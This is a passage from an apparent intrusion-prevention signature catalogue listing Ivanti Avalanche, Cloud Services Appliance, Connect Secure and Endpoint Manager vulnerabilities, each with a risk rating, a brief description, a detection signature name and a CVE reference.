First detected in: sgpkg-ips-1678-5242
Last changed: sgpkg-ips-1678-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Buffer Overflow
Description: A stack-buffer overflow vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to improper input validation when handling InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service or, in the worst case, remote code execution in the security context of SYSTEM.
Situation: Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-101-Stack-Buffer-Overflow
References:
CVE-2023-46216
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46216
Back to top

Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: High
First detected in: sgpkg-ips-1674-5242
Last changed: sgpkg-ips-1674-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Buffer Overflow
Description: A stack-buffer overflow vulnerability has been reported in Ivanti Avalanche. This vulnerability is due to improper input validation when handling InfoRail messages. A remote, unauthenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successfully exploiting this vulnerability could result in denial of service or, in the worst case, remote code execution in the security context of SYSTEM.
Situation: Generic_CS-Ivanti-Avalanche-Wlavalancheservice.exe-Type-102-Stack-Buffer-Overflow
References:
CVE-2023-46217
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46217
Back to top

Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read

About this vulnerability: A vulnerability in Ivanti Avalanche
Risk: Moderate
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Generic
Software: Ivanti Avalanche
Type: Input Validation
Description: Improper input validation in the WLInfoRailService.exe component when handling h.payform messages causes an out of bounds read vulnerability in Ivanti Avalanche. A successful exploitation allows an attacker to cause a denial of service condition on the target system.
Situation: Generic_CS-Ivanti-Avalanche-Wlinforailservice-H.Payform-Out-Of-Bounds-Read
References:
CVE-2024-36136
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36136
Back to top

Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection

About this vulnerability: A vulnerability in Ivanti Cloud Services Appliance.
Risk: High
First detected in: sgpkg-ips-1550-5242
Last changed: sgpkg-ips-1550-5242
Platform: Unix; Linux
Software: Ivanti Cloud Services Appliance
Type: Input Validation
Description: A vulnerability in Ivanti Cloud Services Appliance, versions before 4.6.0-512, which allows remote attackers to execute arbitrary code via a Cookie due to insufficient input validation.
Situation: HTTP_CSH-Ivanti-Cloud-Services-Appliance-(CSA)-Command-Injection
References:
CVE-2021-44529
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44529
Back to top

Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass

About this vulnerability: A vulnerability in Ivanti Cloud Service Appliance
Risk: Moderate
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Ivanti Cloud Services Appliance
Type: Malfunction
Description: Improper validation of user submitted paths causes an authentication bypass vulnerability in Ivanti Cloud Service Appliance. A successful exploitation allows an attacker to access restricted functionality on the service.
Situation: HTTP_CSU-Ivanti-Cloud-Services-Appliance-Broker-Authentication-Bypass
References:
CVE-2024-8963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8963
Back to top

Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190

About this vulnerability: A vulnerability in Ivanti Cloud Services Appliance
Risk: High
First detected in: sgpkg-ips-1781-5242
Last changed: sgpkg-ips-1793-5242
Platform: Generic
Software: Ivanti Cloud Services Appliance
Type: Input Validation
Description: An OS command injection vulnerability has been reported in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and earlier. Exploiting this vulnerability requires authentication, but a misconfiguration during the setup of the vulnerable software may allow an attacker to use the default credentials. Authentication requirements may also be bypassed by exploiting CVE-2024-8963 first.
Situation: HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-8190
References:
CVE-2024-8190
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8190
Back to top

Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380

About this vulnerability: A vulnerability in Ivanti Cloud Services Appliance
Risk: High
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Generic
Software: Ivanti Cloud Services Appliance
Type: Input Validation
Description: An OS command injection vulnerability has been reported in Ivanti Cloud Services Appliance versions 4.6 Patch 518 and earlier. Exploiting this vulnerability requires authentication, but a misconfiguration during the setup of the vulnerable software may allow an attacker to use the default credentials. Authentication requirements may also be bypassed by exploiting CVE-2024-8963 first.
Situation: HTTP_CRL-Ivanti-Cloud-Services-Appliance-Command-Injection-CVE-2024-9380
References:
CVE-2024-9380
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9380
Back to top

Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963

About this vulnerability: A vulnerability in Ivanti Cloud Services Appliance
Risk: High
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Generic
Software: Ivanti Cloud Services Appliance
Type: Directory Traversal
Description: A path traversal vulnerability exists in the Ivanti Cloud Services Appliance 4.6 before patch 519. An unauthenticated attacker can use this vulnerability to access restricted functionalities.
Situation: HTTP_CSU-Ivanti-Cloud-Services-Appliance-Path-Traversal-CVE-2024-8963
References:
CVE-2024-8963
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8963
Back to top

Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Cloud Service Appliance
Risk: Moderate
First detected in: sgpkg-ips-1796-5242
Last changed: sgpkg-ips-1796-5242
Platform: Generic
Software: Ivanti Cloud Services Appliance
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Ivanti Cloud Services Appliance. This vulnerability is due to improper input validation when updating the CSA service configuration. A remote, authenticated attacker could exploit this vulnerability by sending a crafted request to the target server. Successful exploitation could result in arbitrary SQL command execution against the target server's database.
Situation: HTTP_CRL-Ivanti-Cloud-Services-Appliance-Setbrokerconfigvalue-SQL-Injection
References:
CVE-2024-9379
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-9379
Back to top

Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908

About this vulnerability: A vulnerability in Ivanti Cloud Services Appliance
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Ivanti Cloud Services Appliance
Type: Input Validation
Description: Improper input validation when sending a user lockout notification causes a command injection vulnerability in Ivanti Cloud Services Appliance. A succesful exploitation allows an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CS-Ivanti-Cloud-Services-Application-SendAlert-Command-Injection-CVE-2024-47908
References:
CVE-2024-47908
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-47908
Back to top

Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection

About this vulnerability: A vulnerability in Ivanti Connect Secure (ICS)
Risk: Moderate
First detected in: sgpkg-ips-1803-5242
Last changed: sgpkg-ips-1803-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Input Validation
Description: Improper validation of user data containing carriage return and line feed characters when creating new certificates causes a vulnerability in Ivanti Connect Secure. A successful exploitation allows an attacker to inject a payload onto the target and potentially execute arbitrary code.
Situation: HTTP_CRL-Ivanti-Connect-Secure-And-Policy-Secure-OpenSSL-Crlf-Injection
References:
CVE-2024-37404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37404
Back to top

Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Risk: High
First detected in: sgpkg-ips-1819-5242
Last changed: sgpkg-ips-1819-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Input Validation
Description: Improper input validation in the admin portal of Ivanti Connect Secure before 22.7R2.1 and 9.1R18.9, or Ivanti Policy Secure before 22.7R1.1 allows a remote authenticated attacker to achieve remote code execution via OpenSSL CRLF injection.
Situation: HTTP_CRL-Ivanti-Connect-Secure-Authenticated-Crlf-Injection-CVE-2024-37404
References:
CVE-2024-37404
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37404
Back to top

Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805

About this vulnerability: A vulnerability in Ivanti Connect Secure
Risk: High
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Ivanti Connect Secure and Ivanti Policy Secure.
Situation: HTTP_CSU-Ivanti-Connect-Secure-Authentication-Bypass-CVE-2023-46805
References:
CVE-2023-46805
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-46805
Back to top

Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457

About this vulnerability: A vulnerability in Ivanti Connect Secure
Risk: High
First detected in: sgpkg-ips-1864-5242
Last changed: sgpkg-ips-1864-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Buffer Overflow
Description: A stack buffer overflow in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti ZTA Gateways allows unauthenticated remote code execution via an overly long X-Forwarded-For HTTP request header value.
Situation: HTTP_CSH-Ivanti-Connect-Secure-Buffer-Overflow-CVE-2025-22457
References:
CVE-2025-22457
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-22457
Back to top

Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Connect Secure detected
Risk: High
First detected in: sgpkg-ips-1676-5242
Last changed: sgpkg-ips-1676-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Input Validation
Description: Ivanti Connect Secure (ICS, formerly known as Pulse Connect Secure) and Ivanti Policy Secure contain a command injection vulnerability in the web components of these products, which can allow an authenticated administrator to send crafted requests to execute code on affected appliances. This vulnerability can be leveraged in conjunction with CVE-2023-46805, an authenticated bypass issue.
Situation: HTTP_CSU-Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
File-Text_Ivanti-Connect-Secure-Command-Injection-CVE-2024-21887
References:
CVE-2024-21887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21887
Back to top

Ivanti-Connect-Secure-Command-Injection-Vulnerability-CVE-2024-21887

About this vulnerability: A vulnerability in Ivanti Connect Secure
Risk: High
First detected in: sgpkg-ips-1687-5242
Last changed: sgpkg-ips-1687-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Input Validation
Description: A command injection vulnerability has been reported in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA.
Situation: File-TextId_Ivanti-Connect-Remote-Code-Execution-Chain-CVE-2024-21893-CVE-2024-21887
References:
CVE-2024-21887
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21887
Back to top

Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282

About this vulnerability: A vulnerability in Ivanti Connect Secure
Risk: Critical
First detected in: sgpkg-ips-1825-5242
Last changed: sgpkg-ips-1825-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Buffer Overflow
Description: A stack buffer overflow vulnerability allows unauthenticated remote code execution in Ivanti Connect Secure versions before 22.7R2.5. Ivanti Policy Secure versions before 22.7R1.2 and Ivanti Neurons for ZTA gateways versions 22.7R2.3 are also affected.
Situation: HTTP_CS-Ivanti-Connect-Secure-Remote-Code-Execution-CVE-2025-0282
References:
CVE-2025-0282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-0282
Back to top

Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893

About this vulnerability: A vulnerability in Ivanti Connect Secure
Risk: High
First detected in: sgpkg-ips-1687-5242
Last changed: sgpkg-ips-1691-5242
Platform: Generic
Software: Ivanti Connect Secure
Type: Malfunction
Description: A server-side request forgery vulnerability has been reported in Ivanti Connect Secure, Ivanti Policy Secure, and Ivanti Neurons for ZTA.
Situation: HTTP_CSU-Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
HTTP_CSU-Ivanti-Connect-Auth-Bypass-CVE-2024-22024
File-TextId_Ivanti-Connect-Secure-Server-Side-Request-Forgery-CVE-2024-21893
File-TextId_Ivanti-Connect-Remote-Code-Execution-Chain-CVE-2024-21893-CVE-2024-21887
References:
CVE-2024-21893
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-21893
Back to top

Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773

About this vulnerability: A vulnerability in Ivanti Cloud Services Appliance
Risk: High
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Generic
Software: Ivanti Cloud Services Appliance
Type: Input Validation
Description: A SQL injection vulnerability has been reported in Ivanti Cloud Services Appliance. This vulnerability is due to improper input validation when removing core certificates. Successful exploitation could result in arbitrary SQL command execution against the target server's database.
Situation: HTTP_CRL-Ivanti-CSA-Removecorecertificate-SQL-Injection-CVE-2024-11773
References:
CVE-2024-11773
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-11773
Back to top

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-10811

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Risk: High
First detected in: sgpkg-ips-1840-5242
Last changed: sgpkg-ips-1840-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Absolute path traversal in Ivanti Endpoint Manager before the January-2025 security updates allows a remote unauthenticated attacker to leak sensitive information through the "GetHashForFile()" method.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore
References:
CVE-2024-10811
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-10811
Back to top

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13159

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Risk: High
First detected in: sgpkg-ips-1840-5242
Last changed: sgpkg-ips-1840-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Absolute path traversal in Ivanti Endpoint Manager before the January-2025 security updates allows a remote unauthenticated attacker to leak sensitive information through the "GetHashForWildcardRecursive()" method.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore
References:
CVE-2024-13159
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13159
Back to top

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13160

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Risk: High
First detected in: sgpkg-ips-1840-5242
Last changed: sgpkg-ips-1840-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Absolute path traversal in Ivanti Endpoint Manager before the January-2025 security updates allows a remote unauthenticated attacker to leak sensitive information through the "GetHashForWildcard()" method.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore
References:
CVE-2024-13160
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13160
Back to top

Ivanti-Endpoint-Manager-Credential-Coercion-CVE-2024-13161

About this vulnerability: An attempt to exploit a vulnerability in Ivanti Endpoint Manager detected
Risk: High
First detected in: sgpkg-ips-1840-5242
Last changed: sgpkg-ips-1840-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Absolute path traversal in Ivanti Endpoint Manager before the January-2025 security updates allows a remote unauthenticated attacker to leak sensitive information through the "GetHashForSingleFile()" method.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Credential-Coercion-Through-WSVulnerabilityCore
References:
CVE-2024-13161
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-13161
Back to top

Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1853-5242
Last changed: sgpkg-ips-1853-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the MPCore server component causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-DPIDatabase-GetComputerID-SQL-Injection-CVE-2024-50330
References:
CVE-2024-50330
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50330
Back to top

Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1858-5242
Last changed: sgpkg-ips-1858-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Directory Traversal
Description: Improper validation of file paths causes a directory traversal vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to make the target system open and execute arbitrary files.
Situation: File-Text_Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
HTTP_CRL-Ivanti-Endpoint-Manager-ECustomDataForm-OnSaveToDB-Directory-Traversal
References:
CVE-2024-50322
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50322
Back to top

Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: High
First detected in: sgpkg-ips-1834-5242
Last changed: sgpkg-ips-1834-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Directory Traversal
Description: A vulnerability in Ivanti Endpoint Manager, versions 2022 SU6 September security update and prior, and 2024 September Security Update and prior, which allows remote attackers to execute arbitrary code due to the improper validation of the xml DestinationPath parameter.
Situation: File-TextId_Ivanti-Endpoint-Manager-EFile-CreateFile-Directory-Traversal
References:
CVE-2024-34787
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34787
Back to top

Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1837-5242
Last changed: sgpkg-ips-1837-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Directory Traversal
Description: Improper validation of a file paths causes a directory traversal vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary code on the target system.
Situation: File-TextId_Ivanti-Endpoint-Manager-Escript-Getfilepath-Directory-Traversal
References:
CVE-2024-50324
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50324
Back to top

Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1799-5242
Last changed: sgpkg-ips-1799-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: File-TextId_Ivanti-Endpoint-Manager-Etask-Waspreviouslymapped-SQL-Injection
References:
CVE-2024-8191
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-8191
Back to top

Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: High
First detected in: sgpkg-ips-1745-5242
Last changed: sgpkg-ips-1745-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager. A remote, unauthenticated attacker could exploit these vulnerabilities by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: File-TextId_Ivanti-Endpoint-Manager-Eventhandler.asmx-Recordbrokenapp-SQL-Injection
References:
CVE-2024-29825
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29825
Back to top

Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1770-5242
Last changed: sgpkg-ips-1770-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Getlogfilerulesnameuniquesql-SQL-Injection
References:
CVE-2024-29830
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29830
Back to top

Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1793-5242
Last changed: sgpkg-ips-1793-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Getsqlstatement-SQL-Injection
References:
CVE-2024-32845
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32845
Back to top

Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1790-5242
Last changed: sgpkg-ips-1790-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Insufficient validation of XML data when parsing HTTP requests causes an external entity injection vulnerability in Ivanti Endpoint Manager. A successful exploitation may lead to information disclosure.
Situation: File-TextId_Ivanti-Endpoint-Manager-Importxml-XML-External-Entity-Injection
References:
CVE-2024-37397
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-37397
Back to top

Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078

About this vulnerability: A vulnerability in Ivanti Endpoint Manager Mobile
Risk: High
First detected in: sgpkg-ips-1617-5242
Last changed: sgpkg-ips-1617-5242
Platform: Generic
Software: Ivanti Endpoint Manager Mobile
Type: Malfunction
Description: An authentication bypass vulnerability has been reported in Ivanti Endpoint Manager Mobile (formerly MobileIron). A remote attacker can use this vulnerability to access sensitive information, create new accounts, and change the server configuration. Chaining this vulnerability together with CVE-2023-35081 allows remote code execution.
Situation: HTTP_CSU-Ivanti-Endpoint-Manager-Mobile-Authentication-Bypass-CVE-2023-35078
References:
CVE-2023-35078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-35078
Back to top

Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1865-5242
Last changed: sgpkg-ips-1865-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager. A remote, authenticated attacker could exploit the vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-MP_QueryDetail-SQL-Injection-CVE-2024-34781
References:
CVE-2024-34781
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34781
Back to top

Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user-supplied input when processing a request to the serverAsset component of Endpoint Manager. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Serverasset-Updateassetinfo-SQL-Injection
References:
CVE-2024-32848
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32848
Back to top

Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1848-5242
Last changed: sgpkg-ips-1848-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability that, when successfully exploited, allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Serverkbdmouse-LoadMouseTable-SQL-Injection-CVE-2024-32840
References:
CVE-2024-32840
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-32840
Back to top

Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: High
First detected in: sgpkg-ips-1822-5242
Last changed: sgpkg-ips-1822-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: An SQL injection vulnerability has been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user-supplied input when processing a request to the serverMemory component of Endpoint Manager. A remote, authenticated attacker can exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: HTTP_CSU-Ivanti-Endpoint-Manager-Servermemory-Loadmoduletable-SQL-Injection
References:
CVE-2024-34779
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34779
Back to top

Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1795-5242
Last changed: sgpkg-ips-1795-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadmotherboardtable-SQL-Injection
References:
CVE-2024-34785
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34785
Back to top

Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1814-5242
Last changed: sgpkg-ips-1814-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability which allows an attacker to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Servermotherboard-Loadslotstable-SQL-Injection
References:
CVE-2024-34783
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-34783
Back to top

Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1832-5242
Last changed: sgpkg-ips-1832-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability which can be exploited remotely to execute arbitrary SQL on the target system.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Serverstorage-Buildcdromtable-SQL-Injection
References:
CVE-2024-50326
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-50326
Back to top

Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: Moderate
First detected in: sgpkg-ips-1753-5242
Last changed: sgpkg-ips-1753-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: Improper validation of user input in the core server component of Endpoint Manager causes an SQL injection vulnerability in Ivanti Endpoint Manager. A successful exploitation allows an attacker to execute arbitrary SQL on the target system.
Situation: File-TextId_Ivanti-Endpoint-Manager-Vulcore-Getdbvulnerabilities-SQL-Injection
References:
CVE-2024-29823
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29823
Back to top

Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: High
First detected in: sgpkg-ips-1765-5242
Last changed: sgpkg-ips-1765-5242
Platform: Generic
Software: Ivanti Endpoint Manager
Type: Input Validation
Description: An SQL injection vulnerability have been reported in Ivanti Endpoint Manager. The vulnerability is due to improper validation of user input in the core server component of Endpoint Manager. A remote, unauthenticated attacker could exploit this vulnerability by sending crafted requests to the target server. Successful exploitation could result in arbitrary SQL command execution against the database of the target server.
Situation: HTTP_CRL-Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatches-SQL-Injection
References:
CVE-2024-29826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-29826
Back to top

Ivanti-Endpoint-Manager-Vulcore.asmx-Getdbpatchproducts-SQL-Injection

About this vulnerability: A vulnerability in Ivanti Endpoint Manager
Risk: High
First detected in: sgpkg-ips-1784-5242
Last changed: sgpkg-ips-1784-5242
